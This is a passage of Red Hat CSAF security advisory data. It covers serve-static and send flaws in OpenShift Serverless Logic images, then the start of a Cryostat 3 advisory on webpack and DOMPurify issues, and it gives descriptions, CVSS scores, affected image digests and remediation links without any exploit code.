"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
RHSA-2024_7706
Vulnerability from csaf_redhat - Published: 2024-10-07 01:12 - Updated: 2024-12-17 19:02Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7706",
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Cryostat security update",
"tracking": {
"current_release_date": "2024-12-17T19:02:22+00:00",
"generator": {
"date": "2024-12-17T19:02:22+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:7706",
"initial_release_date": "2024-10-07T01:12:29+00:00",
"revision_history": [
{
"date": "2024-10-07T01:12:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T01:12:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
